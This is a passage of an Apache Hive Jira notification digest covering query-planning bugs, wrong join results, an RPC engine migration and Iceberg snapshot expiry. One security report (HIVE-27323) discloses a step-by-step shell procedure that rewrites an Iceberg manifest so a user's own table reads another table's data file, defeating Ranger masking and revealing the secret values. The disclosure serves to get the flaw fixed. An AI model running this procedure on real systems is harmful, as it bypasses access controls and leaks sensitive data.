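        null,                          // no operand type inference needed
        OperandTypes.NUMERIC,          // seconds since the epoch
        SqlFunctionCategory.TIMEDATE);
  }

  // SqlAbstractTimeFunction returns true here, which marks every call as
  // dynamic and blocks constant reduction; FROM_UNIXTIME depends only on its
  // arguments, so folding is safe.
  @Override public boolean isDynamicFunction() {
    return false;
  }

  @Override public boolean isDeterministic() {
    return true;
  }
}
{code}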



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-1626) stop using java.util.Stack

2023-11-30 Thread Chunhui Yang (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-1626?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chunhui Yang updated HIVE-1626:
---
Description: 
We currently use Stack as part of the generic node walking library. Stack 
should not be used for this since its inheritance from Vector incurs 
superfluous synchronization overhead.

Most projects end up adding an ArrayStack implementation and using that 
instead.



> stop using java.util.Stack
> --
>
> Key: HIVE-1626
> URL: https://issues.apache.org/jira/browse/HIVE-1626
> Project: Hive
>  Issue Type: Improvement
>  Components: Query Processor
>Affects Versions: 0.7.0
>Reporter: John Sichi
>Assignee: Teddy Choi
>Priority: Major
>  Labels: pull-request-available
> Attachments: HIVE-1626.2.patch, HIVE-1626.2.patch, HIVE-1626.3.patch, 
> HIVE-1626.3.patch, HIVE-1626.3.patch
>
>  Time Spent: 2h 40m
>  Remaining Estimate: 0h
>
> We currently use Stack as part of the generic node walking library. Stack 
> should not be used for this since its inheritance from Vector incurs 
> superfluous synchronization overhead.
> Most projects end up adding an ArrayStack implementation and using that 
> instead.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin

2023-11-30 Thread Stamatis Zampetakis (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791647#comment-17791647
 ] 

Stamatis Zampetakis commented on HIVE-27658:


For convenience, the query in [^hive27658.q] is presented below.
{code:sql}
SELECT TC.CONST_DATE, TB.PRODUCT_SK
FROM TABLE_A TA
INNER JOIN (SELECT TO_DATE(FROM_UNIXTIME(1701088643)) AS CONST_DATE) TC
ON TA.START_DATE = TC.CONST_DATE
INNER JOIN TABLE_B TB
ON TB.START_DATE = TC.CONST_DATE AND TA.PRODUCT_ID = TB.PRODUCT_ID;{code}
The operator tree before hitting the error described above is depicted in 
[^hive27658-query-plan.pdf]. The problem is triggered while trying to convert 
the JOIN[14] operator into a dynamic partition hash join.

The dynamic partition hash join is the first operator that appears in a Reduce 
Operator Tree and the plan usually looks like the snippet below.
{noformat}
Reduce Operator Tree:
  Map Join Operator
condition map:
 Inner Join 0 to 1
keys:
  0 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint)
  1 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint)
outputColumnNames: _col2, _col5, _col7, _col9, _col15
input vertices:
  0 Map 1
Statistics: Num rows: 1178531569624 Data size: 414666308907440 Basic stats: 
COMPLETE Column stats: COMPLETE
DynamicPartitionHashJoin: true
{noformat}
Observe that the column names for the keys use the "KEY.reducesinkkey" prefix; 
the implementation depends on this naming convention to work properly.

The {{ExprNodeDescUtils#resolveJoinKeysAsRSColumns}} method tries to map the 
join keys to the output column names from the RS operators using the 
{{columnExprMap}} mapping that is present on the RS operators. In this case, it 
fails to resolve the "0 _col1 (type:int), _col2 (type: date)" keys from the 
RS[12] operator because "_col2 (type: date)" is not present in the 
{{columnExprMap}} of RS[12] thus it returns {{null}} and triggers the 
aforementioned exception.
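A simplified model of that resolution step (hypothetical code, not the actual 
{{ExprNodeDescUtils}} source; the String-based expressions and names are 
stand-ins for illustration):
{code:java}
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

final class JoinKeyResolutionSketch {
  // Map each join-key expression to the RS output column that carries it,
  // using the RS operator's columnExprMap. A single unresolved key makes the
  // whole call return null, which surfaces as "Error resolving join keys".
  static List<String> resolveJoinKeysAsRsColumns(
      List<String> joinKeyExprs, Map<String, String> columnExprMap) {
    List<String> resolved = new ArrayList<>();
    for (String keyExpr : joinKeyExprs) {
      String rsColumn = null;
      for (Map.Entry<String, String> e : columnExprMap.entrySet()) {
        if (e.getValue().equals(keyExpr)) {
          rsColumn = e.getKey();        // e.g. "KEY.reducesinkkey1"
          break;
        }
      }
      if (rsColumn == null) {
        return null;                    // the constant DATE key of RS[12] hits this
      }
      resolved.add(rsColumn);
    }
    return resolved;
  }

  public static void main(String[] args) {
    Map<String, String> columnExprMap = new LinkedHashMap<>();
    columnExprMap.put("KEY.reducesinkkey0", "_col1");
    // Inconsistent RS[12]: no entry maps to "_col2", the constant date key.
    System.out.println(resolveJoinKeysAsRsColumns(
        List.of("_col1", "_col2"), columnExprMap));   // prints: null
  }
}
{code}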

Looking closer at RS[12], we can see that there is a slight inconsistency 
between the columnExprMap and the key expressions. The KEY.reducesinkkey1 
entry denotes that the input expression is a constant date, but this is not 
reflected in the key expressions, where _col2 is an expression referencing a 
column. It appears the constant propagation logic did not trigger completely 
for RS[12], leaving it in an intermediate state that is problematic for the 
dynamic partition hash join conversion.
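
For illustration, a hedged and much simplified sketch of the lookup that fails 
(the helper below is hypothetical; the real logic lives in 
ExprNodeDescUtils#resolveJoinKeysAsRSColumns and is more involved):
{code:java}
import java.util.Map;
import org.apache.hadoop.hive.ql.plan.ExprNodeColumnDesc;
import org.apache.hadoop.hive.ql.plan.ExprNodeDesc;

class ResolveSketch {
  static ExprNodeDesc resolveAsRSColumn(ExprNodeDesc key,
      Map<String, ExprNodeDesc> columnExprMap) {
    for (Map.Entry<String, ExprNodeDesc> e : columnExprMap.entrySet()) {
      if (e.getValue().isSame(key)) {
        // Found: rewrite the join key as a reference to the RS output column.
        return new ExprNodeColumnDesc(key.getTypeInfo(), e.getKey(), null, false);
      }
    }
    // "_col2 (type: date)" has no entry in RS[12]'s columnExprMap, so null is
    // returned and the caller raises "SemanticException Error resolving join keys".
    return null;
  }
}
{code}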

> Error resolving join keys during conversion to dynamic partition hashjoin
> -
>
> Key: HIVE-27658
> URL: https://issues.apache.org/jira/browse/HIVE-27658
> Project: Hive
>  Issue Type: Bug
>  Components: Query Planning
>Affects Versions: 3.1.3, 4.0.0-beta-1
>Reporter: xiaojunxiang
>Priority: Major
> Attachments: hive27658-query-plan.pdf, hive27658.q
>
>
> In certain cases the compilation of queries fails during the conversion to a 
> dynamic partition hash join with a stacktrace similar to the one shown 
> below.
> {noformat}
> 2023-08-31T10:22:21,738 WARN  [HiveServer2-Handler-Pool: Thread-100]: 
> thrift.ThriftCLIService (()) - Error executing statement: 
> org.apache.hive.service.cli.HiveSQLException: Error while compiling 
> statement: FAILED: SemanticException Error resolving join keys
>   at 
> org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) 
> ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542)
>  ~[hive-exec-100.jar:?]
>   at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) 
> 

[jira] [Updated] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin

2023-11-30 Thread Stamatis Zampetakis (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Stamatis Zampetakis updated HIVE-27658:
---
Attachment: hive27658-query-plan.pdf

> Error resolving join keys during conversion to dynamic partition hashjoin
> -
>
> Key: HIVE-27658
> URL: https://issues.apache.org/jira/browse/HIVE-27658
> Project: Hive
>  Issue Type: Bug
>  Components: Query Planning
>Affects Versions: 3.1.3, 4.0.0-beta-1
>Reporter: xiaojunxiang
>Priority: Major
> Attachments: hive27658-query-plan.pdf, hive27658.q
>
>
> In certain cases the compilation of queries fails during the conversion to a 
> dynamic partition hash join with a stacktrace similar to the one shown 
> below.
> {noformat}
> 2023-08-31T10:22:21,738 WARN  [HiveServer2-Handler-Pool: Thread-100]: 
> thrift.ThriftCLIService (()) - Error executing statement: 
> org.apache.hive.service.cli.HiveSQLException: Error while compiling 
> statement: FAILED: SemanticException Error resolving join keys
>   at 
> org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) 
> ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542)
>  ~[hive-exec-100.jar:?]
>   at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) 
> ~[hive-exec-100.jar:?]
>   at org.apache.thrift.TBaseProcessor.process(TBaseProcessor.java:39) 
> ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.metastore.security.HadoopThriftAuthBridge$Server$TUGIAssumingProcessor.process(HadoopThriftAuthBridge.java:647)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.thrift.server.TThreadPoolServer$WorkerProcess.run(TThreadPoolServer.java:286)
>  ~[hive-exec-100.jar:?]
>   at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
>  ~[?:1.8.0_312]
>   at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
>  ~[?:1.8.0_312]
>   at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312]
> Caused by: org.apache.hadoop.hive.ql.parse.SemanticException: Error resolving 
> join keys
>   at 
> org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.getMapJoinDesc(MapJoinProcessor.java:1105)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.convertJoinOpMapJoinOp(MapJoinProcessor.java:372)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinMapJoin(ConvertJoinMapJoin.java:1056)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinDynamicPartitionedHashJoin(ConvertJoinMapJoin.java:1280)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.fallbackToReduceSideJoin(ConvertJoinMapJoin.java:1312)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.checkAndConvertSMBJoin(ConvertJoinMapJoin.java:371)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.process(ConvertJoinMapJoin.java:151)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultRuleDispatcher.dispatch(DefaultRuleDispatcher.java:90)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatchAndReturn(DefaultGraphWalker.java:105)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatch(DefaultGraphWalker.java:89)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.ForwardWalker.walk(ForwardWalker.java:74) 
> ~[hive-exec-100.jar:?]
>   at 
> 

[jira] [Assigned] (HIVE-26505) Case When Some result data is lost when there are common column conditions and partitioned column conditions

2023-11-30 Thread Krisztian Kasa (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-26505?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Krisztian Kasa reassigned HIVE-26505:
-

Assignee: Krisztian Kasa

> Case When Some result data is lost when there are common column conditions 
> and partitioned column conditions 
> -
>
> Key: HIVE-26505
> URL: https://issues.apache.org/jira/browse/HIVE-26505
> Project: Hive
>  Issue Type: Bug
>  Components: Hive
>Affects Versions: 3.1.0, 4.0.0-alpha-1
>Reporter: GuangMing Lu
>Assignee: Krisztian Kasa
>Priority: Critical
>  Labels: check, hive-4.0.0-must
>
> {code:sql}
> create table test0831 (id string) partitioned by (cp string);
> insert into test0831 values ('a', '2022-08-23'),('c', '2022-08-23'),('d', 
> '2022-08-23');
> insert into test0831 values ('a', '2022-08-24'),('b', '2022-08-24');
> select * from test0831;
> +--------------+--------------+
> | test0831.id  | test0831.cp  |
> +--------------+--------------+
> | a            | 2022-08-23   |
> | c            | 2022-08-23   |
> | d            | 2022-08-23   |
> | a            | 2022-08-24   |
> | b            | 2022-08-24   |
> +--------------+--------------+
> select * from test0831 where (case when id='a' and cp='2022-08-23' then 1 
> else 0 end)=0;
> +--------------+--------------+
> | test0831.id  | test0831.cp  |
> +--------------+--------------+
> | a            | 2022-08-24   |
> | b            | 2022-08-24   |
> +--------------+--------------+
> {code}
>  
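> For what it's worth, a hedged workaround sketch: the same predicate written 
> without CASE, which should return the four rows other than (a, 2022-08-23):
> {code:sql}
> select * from test0831
> where not (id = 'a' and cp = '2022-08-23');
> {code}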



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97

2023-11-30 Thread Denys Kuzmenko (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791618#comment-17791618
 ] 

Denys Kuzmenko commented on HIVE-27269:
---

Merged to master.
[~seonggon], thank you for the patch!

> VectorizedMapJoin returns wrong result for TPC-DS query 97
> --
>
> Key: HIVE-27269
> URL: https://issues.apache.org/jira/browse/HIVE-27269
> Project: Hive
>  Issue Type: Sub-task
>Reporter: Seonggon Namgung
>Assignee: Seonggon Namgung
>Priority: Critical
>  Labels: hive-4.0.0-must, pull-request-available
>
> TPC-DS query 97 returns wrong results when hive.auto.convert.join and 
> hive.vectorized.execution.enabled are set to true.
>  
> Result of query 97 on 1TB text dataset:
> CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, 
> 284185{*}746{*}, 84163
> MapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163
> VectorMapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163
>  
> Also, I observed that VectorizedMapJoin returned different results for the 
> 100GB dataset when I ran query 97 twice, but I have not been able to 
> reproduce that since.
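> For reference, a hedged sketch of the three comparison runs listed above 
> (the query text comes from the TPC-DS kit and is not repeated here):
> {code:sql}
> -- CommonMergeJoinOperator path
> set hive.auto.convert.join=false;
> -- MapJoinOperator path
> set hive.auto.convert.join=true;
> set hive.vectorized.execution.enabled=false;
> -- VectorMapJoinOperator path (produces the differing middle value)
> set hive.auto.convert.join=true;
> set hive.vectorized.execution.enabled=true;
> {code}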



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27269:
--
Fix Version/s: 4.0.0
   Resolution: Fixed
   Status: Resolved  (was: Patch Available)

> VectorizedMapJoin returns wrong result for TPC-DS query 97
> --
>
> Key: HIVE-27269
> URL: https://issues.apache.org/jira/browse/HIVE-27269
> Project: Hive
>  Issue Type: Sub-task
>Reporter: Seonggon Namgung
>Assignee: Seonggon Namgung
>Priority: Critical
>  Labels: hive-4.0.0-must, pull-request-available
> Fix For: 4.0.0
>
>
> TPC-DS query 97 returns wrong results when hive.auto.convert.join and 
> hive.vectorized.execution.enabled are set to true.
>  
> Result of query 97 on 1TB text dataset:
> CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, 
> 284185{*}746{*}, 84163
> MapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163
> VectorMapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163
>  
> Also, I observed that VectorizedMapJoin returned different results for the 
> 100GB dataset when I ran query 97 twice, but I have not been able to 
> reproduce that since.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27506) Migrate to ProtobufRpcEngine2

2023-11-30 Thread Ayush Saxena (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791603#comment-17791603
 ] 

Ayush Saxena commented on HIVE-27506:
-

[~kanaka] I don't think that is anywhere in the plan. To use 
ProtobufRpcEngine2 we would need the thirdparty (shaded) protobuf as well, so 
I don't think that is happening anytime soon.

> Migrate to ProtobufRpcEngine2
> -
>
> Key: HIVE-27506
> URL: https://issues.apache.org/jira/browse/HIVE-27506
> Project: Hive
>  Issue Type: Task
>  Components: llap
>Reporter: Ashok Kumar
>Priority: Major
>
> Hadoop has moved over from protobuf 2.5.0 to the Hadoop shaded protobuf. 
> It has created 
> [ProtobufRpcEngine2|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine2.java]
>  for this purpose.
> Hive llap still uses 
> [ProtobufRpcEngine|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine.java]
>  which is meant for protobuf 2.5.0, e.g. 
> [Ref#|https://github.com/apache/hive/blob/bd02abc9eba3aa0cd3701b26d9169130551a12ef/llap-common/src/java/org/apache/hadoop/hive/llap/LlapUtil.java#L267]
> This Jira is to update the Hive llap codebase to use ProtobufRpcEngine2.
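> For illustration, a hedged sketch of what the migration amounts to at a call 
> site like the LlapUtil reference above (the protocol class is a placeholder; 
> RPC.setProtocolEngine is the Hadoop API for registering an engine):
> {code:java}
> import org.apache.hadoop.conf.Configuration;
> import org.apache.hadoop.ipc.ProtobufRpcEngine2;
> import org.apache.hadoop.ipc.RPC;
>
> class RpcEngineMigrationSketch {
>   static void register(Configuration conf, Class<?> protocolPb) {
>     // Before: RPC.setProtocolEngine(conf, protocolPb, ProtobufRpcEngine.class);
>     RPC.setProtocolEngine(conf, protocolPb, ProtobufRpcEngine2.class);
>   }
> }
> {code}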



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27323) Iceberg: malformed manifest file or list can cause data breach

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27323:
--
Labels: check pull-request-available  (was: check)

> Iceberg: malformed manifest file or list can cause data breach
> --
>
> Key: HIVE-27323
> URL: https://issues.apache.org/jira/browse/HIVE-27323
> Project: Hive
>  Issue Type: Bug
>  Components: Iceberg integration
>Affects Versions: 4.0.0-alpha-2
>Reporter: Janos Kovacs
>Priority: Blocker
>  Labels: check, pull-request-available
>
> Set to bug/blocker instead of enhancement due to its security-related nature; 
> Hive4 should not be released without a fix for this. Please reset if needed.
>  
> Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals 
> and can't just be fixed via the storagehandler authorizer.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end-user can only access the masked form of the sensitive data as 
> expected...
>  * The users also have privilege to create new tables in their own sandbox 
> databases - let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> non-masked leading to a possible data breach.
>  * Hive runs with doAs=false to be able to enforce FGAC and to avoid the 
> need for end-user direct file-system access.
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> 
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see 
> this.','You are NOT allowed to see this!');
> "
> 
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +++
> | icebergsecured.txt | icebergsecured.secret  |
> +++
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +++
> {noformat}
>  * Now let the user create the malicious table exposing the sensitive data:
> {noformat}
> 
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorseviadata;
> CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) 
> STORED BY ICEBERG
> LOCATION '/some-user-writeable-location/trojanhorseviadata';
> INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
> "
> SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>   beeline --outputformat=csv2 --showHeader=false --verbose=false 
> --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM 
> default.icebergsecured.files;" 2>/dev/null)
> TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>  beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null 
> |grep metadata_location  |grep -v previous_metadata_location | awk '{print 
> $5}')
> TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep 
> "manifest-list"  |cut -f4 -d\")
> hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
> TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
> TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq 
> '.manifest_path' |tr -d \")
> hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
> TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
> mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
> avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp 
> "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
> avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > 
> ${TROJAN_MANIFESTFILE}.schema
> avro-tools fromjson --codec deflate --schema-file 
> ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > 
> ${TROJAN_MANIFESTFILE}.new
> hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
> beeline -e "SELECT * FROM default.trojanhorseviadata;"
> ++---+
> |   trojanhorseviadata.txt   | trojanhorseviadata.secret |
> ++---+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> ++---+
> {noformat}
>  
> There are actually multiple options to create such a table and modify the 
> manifest/list like 

[jira] [Resolved] (HIVE-27633) HMS: MTable to Table process reduces view related SQL

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko resolved HIVE-27633.
---
Fix Version/s: 4.0.0
   Resolution: Fixed

> HMS: MTable to Table process reduces view related SQL
> -
>
> Key: HIVE-27633
> URL: https://issues.apache.org/jira/browse/HIVE-27633
> Project: Hive
>  Issue Type: Improvement
>  Components: Metastore
>Reporter: dzcxzl
>Assignee: dzcxzl
>Priority: Minor
>  Labels: pull-request-available
> Fix For: 4.0.0
>
>




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27633) HMS: MTable to Table process reduces view related SQL

2023-11-30 Thread Denys Kuzmenko (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791569#comment-17791569
 ] 

Denys Kuzmenko commented on HIVE-27633:
---

Merged to master.
thanks for the patch [~dzcxzl], and [~zhangbutao] for the review!

> HMS: MTable to Table process reduces view related SQL
> -
>
> Key: HIVE-27633
> URL: https://issues.apache.org/jira/browse/HIVE-27633
> Project: Hive
>  Issue Type: Improvement
>  Components: Metastore
>Reporter: dzcxzl
>Assignee: dzcxzl
>Priority: Minor
>  Labels: pull-request-available
>




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread Butao Zhang (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791561#comment-17791561
 ] 

Butao Zhang commented on HIVE-27712:


This problem is somewhat similar to 
https://issues.apache.org/jira/browse/HIVE-22633, which may have been fixed by 
https://issues.apache.org/jira/browse/HIVE-23530.

Could you please try the HIVE-23530 patch?

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> Using Hadoop 3.3.4 and Hive 3.1.3,
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a SQL statement with both a group-by and a join, I get the 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ayush Saxena resolved HIVE-27903.
-
Fix Version/s: 4.0.0
   Resolution: Fixed

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
> Fix For: 4.0.0
>
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); (set to the 
